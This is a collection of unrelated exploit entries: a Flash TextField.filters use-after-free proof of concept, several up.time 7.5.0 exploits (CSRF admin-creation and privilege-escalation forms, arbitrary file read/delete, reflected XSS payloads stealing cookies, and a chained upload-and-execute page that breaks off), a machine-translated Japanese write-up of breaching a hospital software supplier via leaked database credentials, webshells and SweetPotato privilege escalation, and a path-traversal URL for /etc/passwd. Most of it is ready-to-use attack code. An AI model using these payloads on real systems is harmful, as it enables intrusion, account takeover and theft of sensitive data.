HireHackking

Source: https://code.google.com/p/google-security-research/issues/detail?id=444&can=1&q=label%3AProduct-Flash%20modified-after%3A2015%2F8%2F17&sort=id [Tracking for https://code.google.com/p/chromium/issues/detail?id=498984] Credit is to bilou, working with the Chromium Vulnerability Rewards Program. --- VULNERABILITY DETAILS There is a use after free vulnerability in the ActionScript 2 TextField.filters array property. This is Issue 457278 resurrected. Again. VERSION Chrome Version: [43.0.2357.124, Flash 18.0.0.160] Operating System: [Windows 7 x64 SP1] REPRODUCTION CASE There is a use after free vulnerability in the ActionScript 2 TextField.filters array property. This is Issue 457278 resurrected. Again. When the TextField.filters array is set, Flash creates an internal array holding the filters. When the property is read, Flash iterates over this array and clones each filter. During this loop, it is possible to execute some AS2 by overriding a filter's constructor. At that moment, if the AS2 code alters the filters array, Flash frees the internal array leaving a reference to freed memory in the stack. When the execution flow resumes to the loop, a use-after-free occurs. Flash 17.0.0.169 added a flag to mitigate Issue 457278 .text:004D6F0B mov esi, [esp+2Ch+var_C] .text:004D6F0F push 1 ; char .text:004D6F11 mov ecx, edi ; int .text:004D6F13 mov byte ptr [esi+0Ch], 1 ; this flag was added .text:004D6F17 call xparseAS2Code .text:004D6F1C mov byte ptr [esi+0Ch], 0 Flash 18.0.0.160 added an other flag to mitigate Issue 476926 .text:004D6E3E loc_4D6E3E: .text:004D6E3E cmp byte ptr [ebp+0Ch], 0 ; this flag was added .text:004D6E42 lea eax, [ebp+0Ch] .text:004D6E45 mov [esp+2Ch+var_8], eax .text:004D6E49 jz short loc_4D6E58 .text:004D6E4B mov ecx, dword_E50A40 .text:004D6E51 call sub_967730 .text:004D6E58 .text:004D6E58 loc_4D6E58: .text:004D6E58 mov byte ptr [eax], 1 .text:004D6E5B jmp short loc_4D6E65 But they didn't figure it was possible to execute AS2 code a bit above in the function: .text:004D6E6F mov eax, [ebp+0] .text:004D6E72 push 0 .text:004D6E74 lea edx, [esp+34h+var_14] .text:004D6E78 push edx .text:004D6E79 mov edx, [eax+14h] .text:004D6E7C mov ecx, ebp .text:004D6E7E call edx ; return the filter name .text:004D6E80 push eax .text:004D6E81 lea eax, [esp+3Ch+var_10] .text:004D6E85 push eax .text:004D6E86 mov ecx, edi .text:004D6E88 call xcreateStringObject .text:004D6E8D mov ebx, [esp+38h+arg_4] .text:004D6E91 push eax .text:004D6E92 push ecx .text:004D6E93 mov eax, esp .text:004D6E95 mov ecx, edi .text:004D6E97 mov [eax], ebx .text:004D6E99 call sub_420400 ; execute some AS2 with a custom __proto__ object For ex: var oob = {} oob.__proto__ = {} oob.__proto__.addProperty("GlowFilter", function () {f(); return 0x123}, function () {}); flash.filters = oob Tested on Flash Player standalone 18.0.0.160, and Chrome 43.0.2357.124. That should crash while dereferencing 0x41424344. Compile with Flash CS 5.5. *************************************************************************** Content of FiltusPafusTer.fla import flash.filters.GlowFilter; var a1:Array = new Array() var a2:Array = new Array() for (i = 0; i<0x50/4;i++) { a2[i] = 0x41424344 } for (var i = 0; i<0x200;i++) { var tf:TextFormat = new TextFormat() a1[i] = tf } for (var i = 0; i<0x200;i++) { a1[i].tabStops = a2 } var tfield:TextField = createTextField("tf",1,1,2,3,4) var glowfilter:GlowFilter = new GlowFilter(1,2,3,4,5,6,true,true) tfield.filters = [glowfilter] function f() { for (var i = 0; i<0x20;i++) { _global.a1[0x100+i*4].tabStops = [1,2,3,4] } _global.tfield.filters = [] for (var i = 0; i<0x200;i++) { _global.a1[i].tabStops = a2 } } _global.tfield = tfield _global.a1 = a1 _global.a2 = a2 var oob = {} oob.__proto__ = {} oob.__proto__.addProperty("GlowFilter", function () {f(); return 0x123}, function () {}); flash.filters = oob var a = tfield.filters --- Proof of Concept: https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/37883.zip

<!-- up.time 7.5.0 Superadmin Privilege Escalation Exploit Vendor: Idera Inc. Product web page: http://www.uptimesoftware.com Affected version: 7.5.0 (build 16) and 7.4.0 (build 13) Summary: The next-generation of IT monitoring software. Desc: up.time suffers from a privilege escalation issue. Normal user can elevate his/her privileges by sending a POST request seting the parameter 'userroleid' to 1. Attacker can exploit this issue using also cross-site request forgery attacks. Tested on: Jetty, PHP/5.4.34, MySQL Apache/2.2.29 (Win64) mod_ssl/2.2.29 OpenSSL/1.0.1j PHP/5.4.34 Vulnerability discovered by Gjoko 'LiquidWorm' Krstic @zeroscience Advisory ID: ZSL-2015-5251 Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2015-5251.php 29.07.2015 -- --> <html> <body> <form action="http://127.0.0.1:9999/main.php?section=UserContainer&subsection=edit&id=4" method="POST"> <input type="hidden" name="operation" value="submit" /> <input type="hidden" name="disableEditOfUsernameRoleGroup" value="false" /> <input type="hidden" name="username" value="Testingus2" /> <input type="hidden" name="password" value="&#42;&#42;&#42;&#42;&#42;" /> <input type="hidden" name="passwordConfirm" value="&#42;&#42;&#42;&#42;&#42;" /> <input type="hidden" name="firstname" value="Test" /> <input type="hidden" name="lastname" value="Ingus" /> <input type="hidden" name="location" value="Neverland" /> <input type="hidden" name="emailaddress" value="test2&#64;test&#46;test" /> <input type="hidden" name="emailtimeperiodid" value="1" /> <input type="hidden" name="phonenumber" value="111111" /> <input type="hidden" name="phonenumbertimeperiodid" value="1" /> <input type="hidden" name="windowshost" value="test" /> <input type="hidden" name="windowsworkgroup" value="testgroup" /> <input type="hidden" name="windowspopuptimeperiodid" value="1" /> <input type="hidden" name="landingpage" value="MyPortal" /> <input type="hidden" name="isonvacation" value="0" /> <input type="hidden" name="receivealerts" value="on" /> <input type="hidden" name="receivealerts" value="1" /> <input type="hidden" name="alertoncritical" value="on" /> <input type="hidden" name="alertoncritical" value="1" /> <input type="hidden" name="alertonwarning" value="on" /> <input type="hidden" name="alertonwarning" value="1" /> <input type="hidden" name="alertonunknown" value="on" /> <input type="hidden" name="alertonunknown" value="1" /> <input type="hidden" name="alertonrecovery" value="on" /> <input type="hidden" name="alertonrecovery" value="1" /> <input type="hidden" name="activexgraphs" value="0" /> <input type="hidden" name="newuser" value="on" /> <input type="hidden" name="newuser" value="1" /> <input type="hidden" name="userroleid" value="1" /> <input type="hidden" name="usergroupid&#91;&#93;" value="1" /> <input type="submit" value="Submit request" /> </form> </body> </html>

 up.time 7.5.0 Arbitrary File Disclose And Delete Exploit Vendor: Idera Inc. Product web page: http://www.uptimesoftware.com Affected version: 7.5.0 (build 16) and 7.4.0 (build 13) Summary: The next-generation of IT monitoring software. Desc: Input passed to the 'file_name' parameter in 'get2post.php' script is not properly sanitised before being used to get the contents of a resource and delete files. This can be exploited to read and delete arbitrary data from local resources with the permissions of the web server using a proxy tool. Tested on: Jetty, PHP/5.4.34, MySQL Apache/2.2.29 (Win64) mod_ssl/2.2.29 OpenSSL/1.0.1j PHP/5.4.34 Vulnerability discovered by Gjoko 'LiquidWorm' Krstic @zeroscience Advisory ID: ZSL-2015-5253 Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2015-5253.php 29.07.2015 -- http://127.0.0.1:9999/wizards/get2post.php?file_name=C:\\test.txt

 up.time 7.5.0 XSS And CSRF Add Admin Exploit Vendor: Idera Inc. Product web page: http://www.uptimesoftware.com Affected version: 7.5.0 (build 16) and 7.4.0 (build 13) Summary: The next-generation of IT monitoring software. Desc: The application allows users to perform certain actions via HTTP requests without performing any validity checks to verify the requests. This can be exploited to perform certain actions with administrative privileges if a logged-in user visits a malicious web site. Multiple cross-site scripting vulnerabilities were also discovered. The issue is triggered when input passed via the multiple parameters is not properly sanitized before being returned to the user. This can be exploited to execute arbitrary HTML and script code in a user's browser session in context of an affected site. Tested on: Jetty, PHP/5.4.34, MySQL Apache/2.2.29 (Win64) mod_ssl/2.2.29 OpenSSL/1.0.1j PHP/5.4.34 Vulnerability discovered by Gjoko 'LiquidWorm' Krstic @zeroscience Advisory ID: ZSL-2015-5252 Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2015-5252.php 29.07.2015 -- CSRF Add Admin: --------------- <html> <body> <form action="http://127.0.0.1:9999/main.php?section=UserContainer&subsection=add&id=0" method="POST"> <input type="hidden" name="operation" value="submit" /> <input type="hidden" name="disableEditOfUsernameRoleGroup" value="false" /> <input type="hidden" name="username" value="Testingus4" /> <input type="hidden" name="password" value="123123" /> <input type="hidden" name="passwordConfirm" value="123123" /> <input type="hidden" name="firstname" value="Test" /> <input type="hidden" name="lastname" value="Ingus" /> <input type="hidden" name="location" value="Neverland" /> <input type="hidden" name="emailaddress" value="test4&#64;test&#46;test" /> <input type="hidden" name="emailtimeperiodid" value="1" /> <input type="hidden" name="phonenumber" value="111111" /> <input type="hidden" name="phonenumbertimeperiodid" value="1" /> <input type="hidden" name="windowshost" value="test" /> <input type="hidden" name="windowsworkgroup" value="testgroup" /> <input type="hidden" name="windowspopuptimeperiodid" value="1" /> <input type="hidden" name="landingpage" value="MyPortal" /> <input type="hidden" name="isonvacation" value="0" /> <input type="hidden" name="receivealerts" value="on" /> <input type="hidden" name="receivealerts" value="1" /> <input type="hidden" name="alertoncritical" value="on" /> <input type="hidden" name="alertoncritical" value="1" /> <input type="hidden" name="alertonwarning" value="on" /> <input type="hidden" name="alertonwarning" value="1" /> <input type="hidden" name="alertonunknown" value="on" /> <input type="hidden" name="alertonunknown" value="1" /> <input type="hidden" name="alertonrecovery" value="on" /> <input type="hidden" name="alertonrecovery" value="1" /> <input type="hidden" name="activexgraphs" value="0" /> <input type="hidden" name="newuser" value="on" /> <input type="hidden" name="newuser" value="1" /> <input type="hidden" name="userroleid" value="2" /> <input type="hidden" name="usergroupid&#91;&#93;" value="1" /> <input type="submit" value="Submit request" /> </form> </body> </html> Reflected XSS: -------------- GET /main.php?section=UserContainer&subsection=edit&id=bc6ac%22%3E%3Cimg%20src%3da%20onerror%3dalert%28document.cookie%29;%3E&name=Testingus4 HTTP/1.1 - GET /main.php?section=UserGroup&subsection=add&operation=submit&id=0&usergroupname=kakodane1&usergroupdescription=kakodane2&usermembership%5B%5D=6&entitymembership%5B%5D=1&entitygroupmembership%5B%5D=1a416c%253c%252fscript%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ea233bd169b0 HTTP/1.1 - GET /main.php?section=UserGroup&subsection=add&operation=submit&id=0&usergroupname=kakodane1&usergroupdescription=kakodane2&usermembership%5B%5D=6&entitymembership%5B%5D=14f2e6%253c%252fscript%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e46cfd43d432&entitygroupmembership%5B%5D=1 HTTP/1.1 - GET /main.php?section=UserContainer&subsection=edit&id=bc6ac"><img%20src%3da%20onload%3dalert(1)>f2c23&name=Testingus4 HTTP/1.1 - GET /main.php?page=Users&subPage=UserContainer&subsection=view&id=240689'%3balert(1)%2f%2f205 HTTP/1.1 - GET /main.php?section=UserContainer&subsection=edit&id=6&name=Testingus4e8b7f%253c%252ftitle%253e%253cscript%253ealert%25281%2529%253c%252fscript%253eadfb7 HTTP/1.1 - GET /main.php?section=UserContainer&subsection=edit7bef8%253c%252ftitle%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ea9095&id=6&name=Testingus4 HTTP/1.1 - GET /main.php?section=UserGroup&subsection=add270d4%253c%252ftitle%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e8c1acb1f950&operation=submit&id=0&usergroupname=kakodane1&usergroupdescription=kakodane2&usermembership%5B%5D=6&entitymembership%5B%5D=1&entitygroupmembership%5B%5D=1 HTTP/1.1 - GET /main.php?page=Reports&subPage=ReportResourceUsage&subsection=edit&operation=submit&range_type=explicit&txtFromDate=2015-07-28a3345"><img%20src%3da%20onload%3dalert(1)>2d6845d9556&txtFromTime=00%3A00%3A00&txtToDate=2015-07-28&txtToTime=23%3A59%3A59&quickdatevalue=1&quickdatetype=day&relativedate=today&value_%5BselectAll_reportoptions%5D=false&reportoptions%5BreportResourceUtilization%5D-visible-checkbox=true&reportoptions%5BreportResourceUtilization%5D=true&reportoptions%5BchartCPUStats%5D-visible-checkbox=true&reportoptions%5BchartCPUStats%5D=true&reportoptions%5BchartMultiCPUPerformanceTotal%5D=false&reportoptions%5BchartNetworkIO%5D=false&reportoptions%5BchartNetworkErrors%5D=false&reportoptions%5BchartTCPRetransmits%5D=false&reportoptions%5BchartFreeMemory%5D=false&reportoptions%5BchartPageScanningStats%5D=false&reportoptions%5BchartDiskStats%5D=false&reportoptions%5BchartFSCap%5D=false&reportoptions%5BchartWorkloadCPU%5D=false&reportoptions%5BchartWorkloadMemSize%5D=false&reportoptions%5BchartWorkloadRSS%5D=false&reportoptions%5BgroupReportBySystem%5D-visible-checkbox=true&reportoptions%5BgroupReportBySystem%5D=true&listtype=system&value_%5BselectAll_entitygroup%5D=false&value_%5Bincludesubgroups%5D=true&includesubgroups=on&entitygroup%5B1%5D=false&value_%5BselectAll_entityview%5D=false&value_%5BselectAll_entity%5D=false&entity%5B1%5D=false&generate_xml=XML+to+Screen&email_type_save=email_user_save&user_email_id_save=1&other_email_address_save=&save_as_name=&save_as_description=&genopt=htmlscreen&email_type=email_user&user_email_id=1&other_email_address= HTTP/1.1 - GET /main.php?page=Reports&subPage=ReportResourceUsage&subsection=edit&operation=submit&range_type=explicit&txtFromDate=2015-07-28&txtFromTime=00%3a00%3a006795f"><img%20src%3da%20onload%3dalert(1)>c92fbc98475&txtToDate=2015-07-28&txtToTime=23%3A59%3A59&quickdatevalue=1&quickdatetype=day&relativedate=today&value_%5BselectAll_reportoptions%5D=false&reportoptions%5BreportResourceUtilization%5D-visible-checkbox=true&reportoptions%5BreportResourceUtilization%5D=true&reportoptions%5BchartCPUStats%5D-visible-checkbox=true&reportoptions%5BchartCPUStats%5D=true&reportoptions%5BchartMultiCPUPerformanceTotal%5D=false&reportoptions%5BchartNetworkIO%5D=false&reportoptions%5BchartNetworkErrors%5D=false&reportoptions%5BchartTCPRetransmits%5D=false&reportoptions%5BchartFreeMemory%5D=false&reportoptions%5BchartPageScanningStats%5D=false&reportoptions%5BchartDiskStats%5D=false&reportoptions%5BchartFSCap%5D=false&reportoptions%5BchartWorkloadCPU%5D=false&reportoptions%5BchartWorkloadMemSize%5D=false&reportoptions%5BchartWorkloadRSS%5D=false&reportoptions%5BgroupReportBySystem%5D-visible-checkbox=true&reportoptions%5BgroupReportBySystem%5D=true&listtype=system&value_%5BselectAll_entitygroup%5D=false&value_%5Bincludesubgroups%5D=true&includesubgroups=on&entitygroup%5B1%5D=false&value_%5BselectAll_entityview%5D=false&value_%5BselectAll_entity%5D=false&entity%5B1%5D=false&generate_xml=XML+to+Screen&email_type_save=email_user_save&user_email_id_save=1&other_email_address_save=&save_as_name=&save_as_description=&genopt=htmlscreen&email_type=email_user&user_email_id=1&other_email_address= HTTP/1.1 - GET /main.php?page=Reports&subPage=ReportResourceUsage&subsection=edit&operation=submit&range_type=explicit&txtFromDate=2015-07-28&txtFromTime=00%3A00%3A00&txtToDate=2015-07-28c0570"><img%20src%3da%20onload%3dalert(1)>77b8cd697e9&txtToTime=23%3A59%3A59&quickdatevalue=1&quickdatetype=day&relativedate=today&value_%5BselectAll_reportoptions%5D=false&reportoptions%5BreportResourceUtilization%5D-visible-checkbox=true&reportoptions%5BreportResourceUtilization%5D=true&reportoptions%5BchartCPUStats%5D-visible-checkbox=true&reportoptions%5BchartCPUStats%5D=true&reportoptions%5BchartMultiCPUPerformanceTotal%5D=false&reportoptions%5BchartNetworkIO%5D=false&reportoptions%5BchartNetworkErrors%5D=false&reportoptions%5BchartTCPRetransmits%5D=false&reportoptions%5BchartFreeMemory%5D=false&reportoptions%5BchartPageScanningStats%5D=false&reportoptions%5BchartDiskStats%5D=false&reportoptions%5BchartFSCap%5D=false&reportoptions%5BchartWorkloadCPU%5D=false&reportoptions%5BchartWorkloadMemSize%5D=false&reportoptions%5BchartWorkloadRSS%5D=false&reportoptions%5BgroupReportBySystem%5D-visible-checkbox=true&reportoptions%5BgroupReportBySystem%5D=true&listtype=system&value_%5BselectAll_entitygroup%5D=false&value_%5Bincludesubgroups%5D=true&includesubgroups=on&entitygroup%5B1%5D=false&value_%5BselectAll_entityview%5D=false&value_%5BselectAll_entity%5D=false&entity%5B1%5D=false&generate_xml=XML+to+Screen&email_type_save=email_user_save&user_email_id_save=1&other_email_address_save=&save_as_name=&save_as_description=&genopt=htmlscreen&email_type=email_user&user_email_id=1&other_email_address= HTTP/1.1 - GET /main.php?page=Reports&subPage=ReportResourceUsage&subsection=edit&operation=submit&range_type=explicit&txtFromDate=2015-07-28&txtFromTime=00%3A00%3A00&txtToDate=2015-07-28&txtToTime=23%3a59%3a592b983"><img%20src%3da%20onload%3dalert(1)>0d9cc3967ae&quickdatevalue=1&quickdatetype=day&relativedate=today&value_%5BselectAll_reportoptions%5D=false&reportoptions%5BreportResourceUtilization%5D-visible-checkbox=true&reportoptions%5BreportResourceUtilization%5D=true&reportoptions%5BchartCPUStats%5D-visible-checkbox=true&reportoptions%5BchartCPUStats%5D=true&reportoptions%5BchartMultiCPUPerformanceTotal%5D=false&reportoptions%5BchartNetworkIO%5D=false&reportoptions%5BchartNetworkErrors%5D=false&reportoptions%5BchartTCPRetransmits%5D=false&reportoptions%5BchartFreeMemory%5D=false&reportoptions%5BchartPageScanningStats%5D=false&reportoptions%5BchartDiskStats%5D=false&reportoptions%5BchartFSCap%5D=false&reportoptions%5BchartWorkloadCPU%5D=false&reportoptions%5BchartWorkloadMemSize%5D=false&reportoptions%5BchartWorkloadRSS%5D=false&reportoptions%5BgroupReportBySystem%5D-visible-checkbox=true&reportoptions%5BgroupReportBySystem%5D=true&listtype=system&value_%5BselectAll_entitygroup%5D=false&value_%5Bincludesubgroups%5D=true&includesubgroups=on&entitygroup%5B1%5D=false&value_%5BselectAll_entityview%5D=false&value_%5BselectAll_entity%5D=false&entity%5B1%5D=false&generate_xml=XML+to+Screen&email_type_save=email_user_save&user_email_id_save=1&other_email_address_save=&save_as_name=&save_as_description=&genopt=htmlscreen&email_type=email_user&user_email_id=1&other_email_address= HTTP/1.1 - GET /main.php?section=UserGroup&subsection=add&operation=submit&id=0&usergroupname=kakodane1&usergroupdescription=kakodane26cca6"><img%20src%3da%20onload%3dalert(1)>84e475837bc&usermembership%5B%5D=6&entitymembership%5B%5D=1&entitygroupmembership%5B%5D=1 HTTP/1.1 - GET /main.php?section=UserGroup&subsection=add&operation=submit&id=0&usergroupname=kakodane1&usergroupdescription=kakodane2&usermembership%5B%5D=6b50fa%253c%252fscript%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ed94954ba0d3&entitymembership%5B%5D=1&entitygroupmembership%5B%5D=1 HTTP/1.1

0x00長い探査 いつか、問題が見つかるかどうかを確認するために、特定の病院の情報システムのセキュリティテストを求めるタスクを受け取りました。予備情報収集の後、病院には公式ウェブサイトがなく、予約登録や支払いなどの機能が1つのWeChat公式アカウントのみが提供されていることがわかりました。ブレークスルーポイントは、この公式アカウントにのみ配置できるようです。 次の写真は、WeChatの公式アカウントのいくつかの機能を示しています。 これらの関数をクリックしてパケットをキャッチしたとき、すべてのリクエストがドメイン名A.Test.comを指していることがわかりました。下の図に示すように、私の厚いコードを許してください. ドメイン名Test.comを検索した後、医療情報システムを提供する地元企業であることがわかりましたが、なぜ病院システムがサプライヤー会社に配置されているのだろうか？データはどのように同期しますか？これらの質問を使用して、ドメイン名a.test.comのテストを開始しました。 このおなじみのページを見た後、このシステムはおそらくSing Bootによって開発されたことを確認しました。一連の通常の操作の後、私はswagger-uiページのみを見つけました。 私たちの目標は権限を取得することであるため、SQLインジェクションやオーバーライドの権利などのこのページのインターフェイスのテストに焦点を当てましたが、実りがなく、ファイルアップロードインターフェイスがなかったため、ここで立ち往生し始めました。 振り返ってみると、ドメイン名a.test.comはtest.comのサブドメインです。 test.comを通じて作成できますか？ Test.comにアクセスして、サプライヤー会社の公式ウェブサイトを開きます。 test.comのドメイン名に関する情報を収集した後、いくつかのサブドメインが特定のクラウドサーバーに解決されたが、IPは異なっていたことがわかりました。 まず第一に、ドメイン名git.test.comが私の注意を引きました。それを開いた後、それはgitlabサービスでした。 Gitlabは歴史的にいくつかの脆弱性で構成されてきました。 残念ながら、このシステムバージョンは比較的高く、すべての脆弱性が固定されています。 パスワードが弱いですか？私はいくつかの一般的に使用されているユーザー名とトップパスワードを使用してそれを爆破しましたが、それは実りがありませんでした。また、この会社のQQグループに追加する方法を見つけ、グループファイルで有効な情報を取得しようとしました。 予想通り、従業員の詳細情報を記録するフォームがグループファイルにあります この情報を使用して、名前と作業番号を使用してGitLabユーザー名に組み合わせて、一般的に使用される弱いパスワードを使用して爆発を標的にしました。私は1つか2つの結果が得られることを望んでいましたが、それはまだ実りがありませんでした。このgitlabにはパスワード強度の要件があり、パスワードが弱いようです。 0x01 liu'an huaming yeyi村 Google Hack Syntaxを使用してこのgitlabを検索すると、認証なしでアクセスできるいくつかの公開リポジトリが見つかりました。 私はこれらの公開されている倉庫に希望を固定し始めました。これらの倉庫を慎重に見ると、それらのほとんどはインターフェイスドキュメントでしたが、この侵入には役に立ちませんでした。 最後に、rabbitmqインストール紹介文でOracleデータベースの接続ユーザー名とパスワードを見つけました。 以前の情報収集プロセス中に、サブドメインX.Test.comに対応するIPアドレスがOracleデータベースポートを開設したことがわかりました。このデータベースにすばやく接続して、ユーザー名とパスワードが正しく、接続できることがわかりました。 このデータベースバージョンは低く、SYSDBAアクセス許可は時間内にあるため、システム許可を使用してコマンドを直接実行できます。 次に、ユーザーを追加してログインし、Oracleデータベースを取得するサーバーを取得します。 MySQL構成ファイルは、このMySQLフォルダーで見つかりました。 Server Test.comはMySQLデータベースを開き、この情報を使用しているため、MySQLデータベースに正常にログインしました。 サプライヤーの公式Webサイトtest.comのバックエンドのユーザー名とパスワードは、MySQLデータベースで正常に取得されました。 Joyでログインしに行ったとき、ログインできることがわかりましたが、ログイン後の背景関数はすべて放棄され、大きなThinkPhpエラーは1つだけでした。 何をするか？バックグラウンドゲッシェルを使用するというアイデアも失われました。 （Thinkphp3を使用してエクスプロイトも試みましたが、すべて失敗しました） 0x02絶望的な状況での生存 この時点で、私はこのMySQLデータベースにのみ希望を置くことができると思います。 Windowsシステムであるため、UDFパワーアップグレードは成功しない可能性が高いため、Webシェルを作成しようとすることしかできません。ウェブシェルを書くときは、絶対的なパスを知る必要があります。さまざまな方法を使用してtest.comにエラーを報告して、エラーメッセージに含まれる絶対パスがあるかどうかを確認しようとしました。一連の操作には結果がなく、404ページしかありません。 他の方法はありません、私は盲目的に推測することができます。 MySQLデータベーステーブルのテーブル名がWebサイトのディレクトリ名であるかどうかを突然考えましたか？ これらの2つのテーブル名を使用して、次の絶対パスを構築します c: \\ hs_web C: \\ hsweb d: \\ hs_web d: \\ hsweb c: \\ hs_webを試みると、ウェブシェルは書き込みが正常に行われたことを促します。 アリの剣に正常に接続する： 現在のユーザー許可は小さいため、ジャガイモを使用して許可が正常に提起されます。 ユーザーを追加して、リモートデスクトップに正常にログインします。 数十の病院が関与するサーバー上のnginx構成ファイルでプロキシルールが見つかりました。 これらの病院のWECHAT公式アカウントビジネスは、最初にTest.comサーバーにアクセスし、次にこのサーバーのNginxから各病院の実際のサーバーに転送することがわかります。その後、これはあまりにも安全ではありません。サプライヤーのサーバーがダウンすると、ビジネスも失われます。 次に、WeChatの公式アカウントバックエンドソースコードがこのサーバーで見つかり、監査のためにコンパニオンに投げられました。バックエンドログインバイパスの脆弱性を発見した後、バックグラウンドに直接ログインできます。 次に、情報を自由に変更します。 この時点で、この浸透は終わりました。実際、病院の実際のIPを取得した後、詳細なテストを実施することもできます。 0x03要約 1。ターゲット病院の公開アカウントをキャッチし、すべてのリクエストがa.test.comドメイン名を指し示していることを発見しました 2。Test.comのドメイン名登録クエリを通じて、それがサプライヤーであることがわかりました。A.Test.comにアクセスすると、「Whitelabel Error Page」というエラーメッセージを促しました。 このシステムは、Sprint Boot Frameworkによって開発されています。 Dirsearchを介してディレクトリをスキャンし、Swagger-UIページがあることがわかります。 SQLインジェクションとファイルアップロードのテストは実りがありません 3.サブドメインスキャンツールを介してtest.comをスキャンし、www.test.com、git.test.com、およびhc.test.comが存在することを発見しました。 同時に、NMAPポートは3つのドメイン名をスキャンし、hc.test.comの対応するIPがポート1521をオープンし、www.test.comがポート3306をオープンしたことを発見しました。 4。Git.test.comを見つけ、いくつかのgitlabの脆弱性と爆破をテストすることは実りがありませんでした。 5. Test.comの公式Webサイトが提供するAfter-Sales QQグループに参加した後、グループに従業員情報フォームをダウンロードします。 従業員の名前と作業番号の組み合わせを通じてgit.test.comを爆破することは無益でした。 6. Google Hackを介してサブドメイン名Site:Git.test.comを検索し、GitLabのいくつかの公共図書館にアクセスできることを発見しました。いくつかのインターフェイスドキュメントが見つかりましたが、それらは役に立たなかった。 Oracleデータベースのユーザー名とパスワードがRabbitmaqライブラリに漏れていることがわかりました。 7.ここでは、リークされたデータベースのユーザー名とパスワードを介してoracleshell.jarを介してhc.test.comに接続します。入力後、SYSDBAアクセス許可、実行可能コマンド、ユーザーと管理者への追加、およびレジストリを介してポート3389を開き、リモートデスクトップのhc.test.comデータベースホストにログインすることがわかりました。 8.データベースホストでは、MySQLデータベース構成ファイルを含むMySQLディレクトリパスが見つかり、ファイルにはデータベースリンクのユーザー名とパスワードが含まれています。 9.サーバーwww.test.comがMySQLデータベースを開くため、NAVICATを使用して、リークされたデータベースユーザー名とパスワードを介してデータベースにリモート接続し、Webサイトログインのユーザー名とパスワードを取得します。 10。www.test.com/adminを入力して、バックグラウンドログインページを表示し、ユーザー名とパスワードを入力し、背景関数が使用されていないことを確認し、thinkphp3.13エラーを促します 11。Thinkphp3.13の脆弱性を通じてシェルを取得してみてくださいが、それは実りがありません 12。ここでは、MySQLログを介してシェルに書き込む必要がありますが、パスは見つかりません。データベースのテーブル名には、2つのテーブルHS_WEBとHSWEBが含まれています。あなたはウェブサイトのディレクトリ名だと思います。推測Webサイトへの物理的なパスは、次のディレクトリです。 c: \\ hs_web C: \\ hsweb d: \\ hs_web d: \\ hsweb 13。c: \\ hs_webをc:にしようとすると、mysqlのログを介して文が正常に記述されます 14.アリの剣を介して文をリンクし、通常の権限を表示するためにWHOAIコマンドを実行します。ここでは、当局はジャガイモを通して首尾よく育てられます sweetpotato.exe -a 'hoami' 15.コマンドターミナルの下にユーザーを追加し、リモートデスクトップを有効にします 16。システムにログインした後、nginx構成があることがわかりました。最後に、病院のWECHAT公式アカウントビジネスが最初にTest.comサーバーにアクセスし、次にこのサーバーのNginxから各病院の実際のサーバーに転送されることがわかりました。 17。その後、WeChatの公式アカウントバックエンドソースコードがこのサーバーで見つかり、ローカルソースコード監査が実施されました。バックグラウンドログインはバイパスされたログインが発見されたため、バックグラウンドに直接ログインできます。 オリジナルリンク：https://xz.aliyun.com/t/10531

source: https://www.securityfocus.com/bid/55685/info An attacker can exploit these issues to obtain sensitive information, to upload arbitrary code, and to run it in the context of the web server process. YingZhiPython 1.9 is vulnerable; other versions may also be affected. ftp://www.example.com/../../../../../../../private/etc/passwd

 up.time 7.5.0 Upload And Execute File Exploit Vendor: Idera Inc. Product web page: http://www.uptimesoftware.com Affected version: 7.5.0 (build 16) and 7.4.0 (build 13) Summary: The next-generation of IT monitoring software. Desc: up.time suffers from arbitrary command execution. Attackers can exploit this issue using the monitor service feature and adding a command with respected arguments to given binary for execution. In combination with the CSRF, Privilege Escalation, Arbitrary text file creation and renaming that file to php for example in arbitrary location and executing system commands with SYSTEM privileges. Tested on: Jetty, PHP/5.4.34, MySQL Apache/2.2.29 (Win64) mod_ssl/2.2.29 OpenSSL/1.0.1j PHP/5.4.34 Vulnerability discovered by Ewerson 'Crash' Guimaraes @zeroscience Advisory ID: ZSL-2015-5254 Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2015-5254.php 29.07.2015 -- <html> <head> <title>Uptime Exploit</title> </head> <body onload="runme();"> <!-- Login --> <form name="login" action="http://127.0.0.1:9999/index.php" method="POST" target="frame0"> <input type="hidden" name="username" value="sample" /> <input type="hidden" name="password" value="123456" /> </form> <!-- Escalate privileges --> <form name="privadm" action="http://127.0.0.1:9999/main.php?section=UserContainer&subsection=edit&id=2" method="POST" target="frame1"> <input type="hidden" name="operation" value="submit" /> <input type="hidden" name="disableEditOfUsernameRoleGroup" value="false" /> <input type="hidden" name="username" value="sample" /> <input type="hidden" name="password" value="123456" /> <input type="hidden" name="passwordConfirm" value="123456" /> <input type="hidden" name="firstname" value="Sample" /> <input type="hidden" name="lastname" value="User" /> <input type="hidden" name="location" value="" /> <input type="hidden" name="emailaddress" value="" /> <input type="hidden" name="emailtimeperiodid" value="1" /> <input type="hidden" name="phonenumber" value="" /> <input type="hidden" name="phonenumbertimeperiodid" value="1" /> <input type="hidden" name="windowshost" value="" /> <input type="hidden" name="windowsworkgroup" value="" /> <input type="hidden" name="windowspopuptimeperiodid" value="1" /> <input type="hidden" name="landingpage" value="MyPortal" /> <input type="hidden" name="isonvacation" value="0" /> <input type="hidden" name="receivealerts" value="0" /> <input type="hidden" name="activexgraphs" value="0" /> <input type="hidden" name="newuser" value="on" /> <input type="hidden" name="newuser" value="1" /> <input type="hidden" name="userroleid" value="1" /> <input type="hidden" name="usergroupid&#91;&#93;" value="1" /> </form> <!-- Log-off to refresh permission --> <form name="logoff" action="http://127.0.0.1:9999/main.php" method="POST" target="frame2"> <input type="hidden" name="logout" value="1" /> </form> <!-- Login with escalated user --> <form name="login2" action="http://127.0.0.1:9999/index.php?loggedout" method="POST" target="frame3"> <input type="hidden" name="username" value="sample" /> <input type="hidden" name="password" value="123456" /> </form> <!-- Creating Monitor to rename php shell --> <form name="createmonitor" action="http://127.0.0.1:9999/main.php?section=ERDCInstance&subsection=add" method="POST" target="frame4"> <input type="hidden" 